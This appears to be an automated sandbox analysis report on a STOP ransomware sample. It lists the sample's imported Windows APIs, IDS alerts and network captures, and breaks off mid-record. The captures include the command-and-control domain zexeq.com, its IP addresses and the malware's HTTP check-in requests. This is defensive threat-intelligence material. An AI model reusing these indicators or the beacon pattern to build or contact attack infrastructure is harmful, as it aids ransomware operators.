                                                                                                                          KERNEL32.dllVirtualFree, WriteFile, GetDriveTypeA, OpenProcess, GlobalAlloc, GetSystemDirectoryW, WideCharToMultiByte, LoadLibraryW, Sleep, CopyFileW, FormatMessageW, lstrcpynW, CreateProcessA, TerminateProcess, ReadFile, CreateFileW, lstrcatA, GetEnvironmentVariableA, lstrcmpW, MultiByteToWideChar, lstrlenW, FlushFileBuffers, GetShortPathNameA, GetFileSizeEx, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, MoveFileW, FindClose, Process32FirstW, LocalAlloc, CreateEventW, GetModuleFileNameA, Process32NextW, lstrcatW, CreateMutexA, FindNextFileW, CreateToolhelp32Snapshot, SetEnvironmentVariableA, DeleteFileW, LocalFree, lstrcpyW, DeleteFileA, lstrcpyA, SetPriorityClass, GetCurrentProcess, GetComputerNameW, GetLogicalDrives, GetModuleFileNameW, SetStdHandle, GetVersion, CreateDirectoryA, CreateThread, CompareStringW, GetTimeFormatW, GetDateFormatW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, CreateSemaphoreW, GetModuleHandleW, GetTickCount, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleA, GetVersionExA, GlobalMemoryStatus, LoadLibraryA, FlushConsoleInputBuffer, WaitForSingleObject, CreateDirectoryW, SetFilePointerEx, CreateProcessW, FreeLibrary, SetErrorMode, lstrlenA, SetFilePointer, FindFirstFileW, SetConsoleMode, CreateFileA, GetCommandLineW, GetNumberOfConsoleInputEvents, PeekConsoleInputA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetTimeZoneInformation, RaiseException, GetStringTypeW, GetConsoleCP, ReadConsoleW, GetConsoleMode, HeapSize, LoadLibraryExW, OutputDebugStringW, SetConsoleCtrlHandler, RtlUnwind, FatalAppExitA, GetStartupInfoW, GetExitCodeProcess, LCMapStringW, DeleteCriticalSection, AreFileApisANSI, ExitProcess, GetProcessHeap, HeapReAlloc, GlobalFree, SetEndOfFile, ReadConsoleInputA, CloseHandle, HeapFree, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, GetModuleHandleExW, WriteConsoleW, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCurrentThread, GetCurrentThreadId
                                                                                                                          USER32.dllPeekMessageW, PostThreadMessageW, DefWindowProcW, DispatchMessageW, UpdateWindow, CreateWindowExW, LoadCursorW, IsWindow, ShowWindow, RegisterClassExW, PostQuitMessage, GetMessageW, DestroyWindow, SendMessageW, GetProcessWindowStation, GetUserObjectInformationW, MessageBoxA, GetDesktopWindow, MessageBoxW, TranslateMessage
                                                                                                                          ADVAPI32.dllRegCloseKey, CloseServiceHandle, GetUserNameW, ReportEventA, RegisterEventSourceA, DeregisterEventSource, CryptHashData, RegSetValueExW, CryptDestroyHash, ControlService, RegOpenKeyExW, CryptCreateHash, CryptEncrypt, CryptImportKey, QueryServiceStatus, RegQueryValueExW, CryptReleaseContext, OpenServiceW, OpenSCManagerW, CryptAcquireContextW, CryptGetHashParam
                                                                                                                          SHELL32.dllSHGetPathFromIDListW, SHGetSpecialFolderLocation, ShellExecuteA, ShellExecuteExW, CommandLineToArgvW, SHGetFolderPathA
                                                                                                                          ole32.dllCoInitialize, CoInitializeSecurity, CoUninitialize, CoCreateInstance
                                                                                                                          OLEAUT32.dllSysFreeString, VariantInit, VariantClear, GetErrorInfo, CreateErrorInfo, SetErrorInfo, VariantChangeType, SysAllocString
                                                                                                                          IPHLPAPI.DLLGetAdaptersInfo
                                                                                                                          WS2_32.dllinet_ntoa, inet_addr, gethostbyname
                                                                                                                          DNSAPI.dllDnsFree, DnsQuery_W
                                                                                                                          CRYPT32.dllCryptStringToBinaryA
                                                                                                                          GDI32.dllDeleteObject, GetObjectA, SelectObject, GetDeviceCaps, GetBitmapBits, BitBlt, DeleteDC, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap

                                                                                                                          Possible Origin

                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          EnglishUnited States

                                                                                                                          Network Behavior

                                                                                                                          Snort IDS Alerts

                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                          192.168.2.4175.119.10.23149733802833438 01/16/24-00:41:03.506186TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4973380192.168.2.4175.119.10.231
                                                                                                                          192.168.2.4175.119.10.23149746802833438 01/16/24-00:41:20.984825TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4974680192.168.2.4175.119.10.231
                                                                                                                          192.168.2.4175.119.10.23149736802833438 01/16/24-00:41:09.184797TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4973680192.168.2.4175.119.10.231
                                                                                                                          192.168.2.4175.119.10.23149737802833438 01/16/24-00:41:15.342258TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4973780192.168.2.4175.119.10.231

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 16, 2024 00:40:57.980026007 CET49729443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:57.980072021 CET44349729172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:40:57.980313063 CET49729443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:57.993602037 CET49729443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:57.993693113 CET44349729172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:40:58.205245018 CET44349729172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:40:58.205343962 CET49729443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:58.343508005 CET49729443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:58.343585014 CET44349729172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:40:58.344038963 CET44349729172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:40:58.344356060 CET49729443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:58.352798939 CET49729443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:58.393919945 CET44349729172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:40:58.716928005 CET44349729172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:40:58.717081070 CET44349729172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:40:58.717139006 CET49729443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:58.717139959 CET49729443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:58.726283073 CET49729443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:58.726303101 CET44349729172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:40:59.871066093 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:59.871191025 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:40:59.871315002 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:59.880713940 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:40:59.880753994 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.090859890 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.091046095 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.113570929 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.113650084 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.114176035 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.114272118 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.124228001 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.165904045 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.593816996 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.593955040 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.594036102 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.594103098 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.594970942 CET49730443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.595010042 CET44349730172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.755898952 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.755922079 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.756007910 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.766473055 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.766484976 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.971697092 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.971820116 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.978084087 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.978089094 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.978418112 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.978473902 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.981556892 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:01.022034883 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:01.472970009 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:01.473088980 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:01.473159075 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:01.477667093 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:01.477678061 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:03.206746101 CET4973280192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.206984043 CET4973380192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.486532927 CET8049732175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:03.486634970 CET4973280192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.487109900 CET4973280192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.505781889 CET8049733175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:03.505906105 CET4973380192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.506186008 CET4973380192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.768572092 CET8049732175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:03.768655062 CET4973280192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.768733025 CET4973280192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.806804895 CET8049733175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:03.807022095 CET4973380192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.807075977 CET4973380192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:04.048137903 CET8049732175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:04.106853962 CET8049733175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:07.822959900 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:07.823054075 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:07.823144913 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:07.835408926 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:07.835448027 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.043272972 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.043380022 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.048804998 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.048842907 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.049257040 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.049324036 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.051383972 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.097913980 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.591229916 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.591322899 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.591398001 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.591450930 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.591468096 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.591511011 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.591521025 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.591561079 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.592253923 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.592283010 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.808545113 CET4973580192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:08.886604071 CET4973680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:09.120846987 CET8049735175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:09.120974064 CET4973580192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:09.121315002 CET4973580192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:09.184415102 CET8049736175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:09.184501886 CET4973680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:09.184797049 CET4973680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:09.485234022 CET8049736175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:09.485343933 CET4973680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:09.485457897 CET4973680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:09.783704042 CET8049736175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:09.791928053 CET4973580192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:10.102770090 CET8049735175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:10.102838993 CET4973580192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:10.102992058 CET4973580192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:10.415308952 CET8049735175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:15.041045904 CET4973780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.136635065 CET4973880192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.341816902 CET8049737175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:15.341955900 CET4973780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.342257977 CET4973780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.418817043 CET8049738175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:15.418924093 CET4973880192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.419260979 CET4973880192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.642679930 CET8049737175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:15.642767906 CET4973780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.642889023 CET4973780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.701627970 CET8049738175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:15.701704025 CET4973880192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.706027985 CET4973880192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.943512917 CET8049737175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:15.987473965 CET8049738175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.116209984 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.116235018 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.116312981 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.125849009 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.125861883 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.332099915 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.332209110 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.338201046 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.338208914 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.338548899 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.338607073 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.341079950 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.385895014 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.836150885 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.836225986 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.836241007 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.836337090 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.836344957 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.836401939 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.836405039 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.836520910 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.838030100 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.838042021 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:20.700923920 CET4974680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:20.794480085 CET4974780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:20.981084108 CET8049746175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:20.984493971 CET4974680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:20.984824896 CET4974680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:21.086405039 CET8049747175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:21.086525917 CET4974780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:21.086894989 CET4974780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:21.264380932 CET8049746175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:21.264462948 CET4974680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:21.264666080 CET4974680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:21.378422022 CET8049747175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:21.378515959 CET4974780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:21.378604889 CET4974780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:21.545272112 CET8049746175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:21.668096066 CET8049747175.119.10.231192.168.2.4

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 16, 2024 00:40:57.863435030 CET5215553192.168.2.41.1.1.1
                                                                                                                          Jan 16, 2024 00:40:57.965809107 CET53521551.1.1.1192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.737171888 CET5335753192.168.2.41.1.1.1
                                                                                                                          Jan 16, 2024 00:41:01.746212006 CET5335753192.168.2.41.1.1.1
                                                                                                                          Jan 16, 2024 00:41:02.745091915 CET5335753192.168.2.41.1.1.1
                                                                                                                          Jan 16, 2024 00:41:03.192943096 CET53533571.1.1.1192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:03.193016052 CET53533571.1.1.1192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:03.193098068 CET53533571.1.1.1192.168.2.4

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Jan 16, 2024 00:40:57.863435030 CET192.168.2.41.1.1.10x885fStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:00.737171888 CET192.168.2.41.1.1.10x5674Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:01.746212006 CET192.168.2.41.1.1.10x5674Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:02.745091915 CET192.168.2.41.1.1.10x5674Standard query (0)zexeq.comA (IP address)IN (0x0001)false

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Jan 16, 2024 00:40:57.965809107 CET1.1.1.1192.168.2.40x885fNo error (0)api.2ip.ua172.67.139.220A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:40:57.965809107 CET1.1.1.1192.168.2.40x885fNo error (0)api.2ip.ua104.21.65.24A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.192943096 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.192943096 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com210.182.29.70A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.192943096 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.192943096 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com211.181.24.133A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.192943096 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.192943096 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.192943096 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.192943096 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.192943096 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.192943096 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193016052 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193016052 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com210.182.29.70A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193016052 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193016052 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com211.181.24.133A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193016052 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193016052 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193016052 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193016052 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193016052 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193016052 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193098068 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193098068 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com210.182.29.70A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193098068 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193098068 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com211.181.24.133A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193098068 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193098068 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193098068 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193098068 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193098068 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                          Jan 16, 2024 00:41:03.193098068 CET1.1.1.1192.168.2.40x5674No error (0)zexeq.com123.140.161.243A (IP address)IN (0x0001)false

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • api.2ip.ua
                                                                                                                          • zexeq.com

                                                                                                                          HTTP Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.449732175.119.10.231807568C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 16, 2024 00:41:03.487109900 CET137OUTGET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: zexeq.com


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.449733175.119.10.231807620C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 16, 2024 00:41:03.506186008 CET126OUTGET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: zexeq.com


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.449735175.119.10.231807568C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          TimestampBytes transferredDirectionData
